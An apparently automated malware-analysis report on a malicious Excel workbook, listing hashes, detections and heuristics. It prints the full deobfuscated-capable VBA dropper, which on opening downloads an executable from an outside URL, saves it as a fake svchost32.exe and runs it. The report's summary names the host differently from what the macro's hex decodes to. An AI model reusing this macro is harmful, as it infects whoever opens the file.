Office (OOXML) malware analysis — malicious · 7cec0264a88a4379

MALICIOUS

Office (OOXML)

53.6 KB First seen: 2020-09-07

MD5: d5c0ceeea29474d36fdebd6e1c1ed21b SHA-1: 81580679ee6bc8b4644884c763dbe8a3b8c9c812 SHA-256: 7cec0264a88a4379ee41d2e4bdc5bd3ca99c8b02d1706c13db297041e521619a

308 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The VBA macro contains an obfuscated Workbook_Open subroutine that decodes a URL and downloads an executable file. The script reconstructs the URL "http://www.freshertools.online/AmdaXWE.exe" and uses CreateObject to facilitate the download and execution of the payload. This behavior is indicative of a downloader malware.

Heuristics 6

ClamAV: Xls.Malware.Sagent-10035294-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sagent-10035294-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
HDFHBSADHFBSKJDFIKSDJFHWUOR8W8ER792EUFUIEFOU.write AZCSFWRFplxbshdgdgfchtqQAERWDSPOLYTGDFVXFANMJHBDGRTZAPLIU.responseBody
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Set AZCSFWRFplxbshdgdgfchtqQAERWDSPOLYTGDFVXFANMJHBDGRTZAPLIU = CreateObject(HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set AZCSFWRFplxbshdgdgfchtqQAERWDSPOLYTGDFVXFANMJHBDGRTZAPLIU = CreateObject(HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	7827 bytes
SHA-256: `4ee81fefaaa8a280cee50b364d576376555a9a404afce773fe2ab526b8d3a7a9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() PCVB09AQWZCXyTY670PLVCBFSGGGRAQMLKZVAGSFERT"68 74 74 70 3A 2F 2F 77 77 77 2E 66 72 65 73 68 65 72 77 6F 72 6C 64 2E 6F 6E 6C 69 6E 65 2F 41 6D 64 61 58 57 45 2E 65 78 65" End Sub Public Sub PCVB09AQWZCXyTY670PLVCBFSGGGRAQMLKZVAGSFERT(Link As String) Range("A1:J22").Select Selection.Borders(xlDiagonalDown).LineStyle = xlNone Selection.Borders(xlDiagonalUp).LineStyle = xlNone With Selection.Borders(xlEdgeLeft) .LineStyle = xlContinuous .ColorIndex = 0 .TintAndShade = 0 .Weight = xlThin End With Dim AZCSFWRFplxbshdgdgfchtqQAERWDSPOLYTGDFVXFANMJHBDGRTZAPLIU With Selection.Borders(xlEdgeTop) .LineStyle = xlContinuous .ColorIndex = 0 .TintAndShade = 0 .Weight = xlThin End With Dim HDFHBSADHFBSKJDFIKSDJFHWUOR8W8ER792EUFUIEFOU With Selection.Borders(xlEdgeBottom) .LineStyle = xlContinuous .ColorIndex = 0 .TintAndShade = 0 .Weight = xlThin End With Dim HZDHFGWE6RT9WEHCUDIFWEEU9R23QJHDFW0PJZGASW With Selection.Borders(xlEdgeRight) .LineStyle = xlContinuous .ColorIndex = 0 .TintAndShade = 0 .Weight = xlThin End With Set AZCSFWRFplxbshdgdgfchtqQAERWDSPOLYTGDFVXFANMJHBDGRTZAPLIU = CreateObject(HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) With Selection.Borders(xlInsideVertical) .LineStyle = xlContinuous .ColorIndex = 0 .TintAndShade = 0 .Weight = xlThin End With Set HDFHBSADHFBSKJDFIKSDJFHWUOR8W8ER792EUFUIEFOU = CreateObject(HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88("41 44 4f 44 42 2e 53 74 72 65 61 6d")) With Selection.Borders(xlInsideHorizontal) .LineStyle = xlContinuous .ColorIndex = 0 .TintAndShade = 0 .Weight = xlThin End With Set HZDHFGWE6RT9WEHCUDIFWEEU9R23QJHDFW0PJZGASW = CreateObject(HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88("57 53 63 72 69 70 74 2e 53 68 65 6c 6c ")) ActiveWindow.SmallScroll Down:=-12 Range("A1").Select ActiveCell.FormulaR1C1 = "S.No" Range("B1").Select ActiveCell.FormulaR1C1 = "Name" Range("C1").Select ActiveCell.FormulaR1C1 = "Unit" Range("D1").Select ActiveCell.FormulaR1C1 = "Price" Range("E1").Select ActiveCell.FormulaR1C1 = "Qty" Range("F1:J22").Select Url = HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88(Link) With Selection .HorizontalAlignment = xlCenter .VerticalAlignment = xlBottom .WrapText = False .Orientation = 0 .AddIndent = False .IndentLevel = 0 .ShrinkToFit = False .ReadingOrder = xlContext .MergeCells = False End With Selection.Merge urloasjdklweqad_babu = HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65") With Selection .HorizontalAlignment = xlCenter .VerticalAlignment = xlBottom .WrapText = False .Orientation = xlVertical .AddIndent = False .IndentLevel = 0 .ShrinkToFit = False .ReadingOrder = xlContext .MergeCells = True End With RUNCMD = HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65") Range("F1:J22").Select ActiveCell.FormulaR1C1 = "S" Range("F1:J22").Select ActiveCell.FormulaR1C1 = "S" & Chr(10) & "u" & Chr(10) & "m" & Chr(10) & "r" & Chr(10) & "r" & Chr(10) & "y" Range("F1:J22").Select AZCSFWRFplxbshdgdgfchtqQAERWDSPOLYTGDFVXFANMJHBDGRTZAPLIU.Open "G" + "E" + "T", Url, False With Selection .HorizontalAlignment = xlCenter .VerticalAlignment = xlBottom .Orientation = 0 .AddIndent = False .IndentLevel = 0 .ShrinkToFit = False .ReadingOrder = xlContext .MergeCells = True End With AZCSFWRFplxbshdgdgfchtqQAERWDSPOLYTGDFVXFANMJHBDGRTZAPLIU.send Range("F1:J22").Select With Selection .HorizontalAlignment = xlCenter .VerticalAlignment = xlCenter .Orientation = 0 .AddIndent = False .IndentLevel = 0 .ShrinkToFit = False .ReadingOrder = xlContext .MergeCells = True End With HDFHBSADHFBSKJDFIKSDJFHWUOR8W8ER792EUFUIEFOU.Type = 1 With Selection.Font .Name = "Calibri" .Size = 14 .Strikethrough = False .Superscript = False .Subscript = False .OutlineFont = False .Shadow = False .Underline = xlUnderlineStyleNone .ThemeColor = xlThemeColorLight1 .TintAndShade = 0 .ThemeFont = xlThemeFontMinor End With HDFHBSADHFBSKJDFIKSDJFHWUOR8W8ER792EUFUIEFOU.Open Selection.Font.Bold = True HDFHBSADHFBSKJDFIKSDJFHWUOR8W8ER792EUFUIEFOU.write AZCSFWRFplxbshdgdgfchtqQAERWDSPOLYTGDFVXFANMJHBDGRTZAPLIU.responseBody Selection.Font.Italic = True HDFHBSADHFBSKJDFIKSDJFHWUOR8W8ER792EUFUIEFOU.savetofile urloasjdklweqad_babu, 2 Range("L4").Select HZDHFGWE6RT9WEHCUDIFWEEU9R23QJHDFW0PJZGASW.Run RUNCMD End Sub Function nn20tyth1i9(str As String) As Variant: Dim bytes() As Byte: bytes = str: nn20tyth1i9 = bytes: End Function Function jo8dnbtrcjdg4z48d(bytes() As Byte) As String: Dim str As String: str = bytes: jo8dnbtrcjdg4z48d = str: End Function Function l2bc3qdodjnjx15of(str As String) As String Const BCvo09gf89_BVC As String = "eciwdr8uax3hx9t7t" Dim ZdaVCfdpVCP_KaKal() As Byte, SokNAH_() As Byte ZdaVCfdpVCP_KaKal = nn20tyth1i9(str) SOtAN_ = nn20tyth1i9(BCvo09gf89_BVC) Dim Sola67BChdPo_NcBBn As Long Sola67BChdPo_NcBBn = UBound(ZdaVCfdpVCP_KaKal) ReDim BCVPlokIgdh67BCGF_BQAZ(0 To Sola67BChdPo_NcBBn) As Byte Dim idx As Long For idx = LBound(ZdaVCfdpVCP_KaKal) To Sola67BChdPo_NcBBn: If Not ZdaVCfdpVCP_KaKal(idx) = 0 Then c = ZdaVCfdpVCP_KaKal(idx) For i = 0 To UBound(SOtAN_): c = c Xor SOtAN_(i) Next i BCVPlokIgdh67BCGF_BQAZ(idx) = c End If Next idx l2bc3qdodjnjx15of = jo8dnbtrcjdg4z48d(BCVPlokIgdh67BCGF_BQAZ) End Function Public Function HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88(ByVal PADUTYQPLZBCNFHYTSDWRFSGMLZGAGWRyhfbwe708409dfibfusdufh As String) As String Dim q54id4ms3w0r058ze As String Dim tk9qqtx1kf82ez1h4 As String Dim mnq4u978707b75ukj As Long For mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev = 1 To Len(PADUTYQPLZBCNFHYTSDWRFSGMLZGAGWRyhfbwe708409dfibfusdufh) Step 3 wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa = Chr$(Val(l2bc3qdodjnjx15of("Q" & "?" ) & Mid$(PADUTYQPLZBCNFHYTSDWRFSGMLZGAGWRyhfbwe708409dfibfusdufh, mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev, 2))) tk9qqtx1kf82ez1h4 = tk9qqtx1kf82ez1h4 & wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa Next mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev HDSHFBIDBXBDFIYGFGWER47RNVHCBVBP88 = tk9qqtx1kf82ez1h4 End Function Attribute VB_Name = "Sheet 1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	7680 bytes
SHA-256: `59ec5f420119be09e547c6f6765a7de9b455cda35872e22db664da4c3b86b0e7`
Detection ClamAV: Xls.Malware.Sagent-10035294-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.